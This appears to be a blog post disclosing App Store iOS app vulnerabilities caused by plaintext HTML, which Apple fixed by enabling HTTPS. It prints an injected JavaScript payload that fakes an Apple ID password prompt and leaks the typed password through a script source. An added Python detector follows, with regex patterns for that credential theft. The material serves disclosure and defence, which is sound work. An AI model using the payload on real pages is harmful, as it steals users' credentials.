In early July 2012, I reported to Apple numerous vulnerabilities related to their App Store iOS app. In early March Apple finally issued a fix for them and turned on HTTPS for the App Store. I am really happy that my spare-time work pushed Apple to finally enable HTTPS to protect users. This post discusses the vulnerabilities I found.
Attacks included password stealing, app swapping, fake app upgrades, preventing application installation, and privacy leaks, all made possible by simply intercepting and manipulating the HTML used by the App Store app.
<script>
// Injected into the plaintext HTML the App Store app renders: a fake dialog asks
// for the Apple ID password, then a script element whose src carries the typed
// value is appended to the page so the browser's request leaks it to whoever
// is intercepting the connection.
password = prompt("Apple ID Password","");
var s = document.createElement('script');
s.type = "text/javascript";
s.src = "fakepassword=" + password;
document.getElementsByTagName('head')[0].appendChild(s);
</script>
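From the defender's side, the same injection is easy to spot in captured traffic: any HTML served over plain HTTP is modifiable in transit, and a script that calls prompt() with a password label or builds a script src out of a password variable is a strong signal. The following is an added example, not code from the original post; the URLs and response bodies are constructed samples standing in for what a proxy or network sensor would record.

```python
import re
from urllib.parse import urlparse

# Constructed (request URL, response body) pairs. The second body mimics the
# injected prompt() script described above; the others are benign.
SAMPLE_RESPONSES = [
    ("http://example.invalid/app/details",
     "<html><body><h1>App page</h1></body></html>"),
    ("http://example.invalid/app/details",
     '<script>password = prompt("Apple ID Password","");'
     'var s=document.createElement("script");s.src="fakepassword="+password;'
     'document.getElementsByTagName("head")[0].appendChild(s);</script>'),
    ("https://example.invalid/app/details",
     "<html><script>var x = 1;</script></html>"),
]

# Inline script bodies, a prompt() whose label mentions a password, and a
# script src assembled from a variable named password.
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
PROMPT_RE = re.compile(r"\bprompt\s*\(\s*[\"'][^\"']*password[^\"']*[\"']",
                       re.IGNORECASE)
EXFIL_RE = re.compile(r"\.src\s*=\s*[^;]*password", re.IGNORECASE)


def classify(url, body):
    """Return the list of findings for one HTTP response (empty if clean)."""
    findings = []
    if urlparse(url).scheme != "https":
        # Without TLS the body could have been rewritten on the path.
        findings.append("plaintext-transport")
    for script in SCRIPT_RE.findall(body):
        if PROMPT_RE.search(script):
            findings.append("password-prompt-in-script")
        if EXFIL_RE.search(script):
            findings.append("password-in-script-src")
    return findings


def audit(responses):
    """Classify every captured response; pairs each URL with its findings."""
    return [(url, classify(url, body)) for url, body in responses]


if __name__ == "__main__":
    for url, findings in audit(SAMPLE_RESPONSES):
        print(url, findings or "clean")
```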
May this be a lesson for all those offering services out there to enable SSL and route all traffic over HTTPS.
Apple finally turns HTTPS on for the App Store, fixing a lot of vulnerabilities →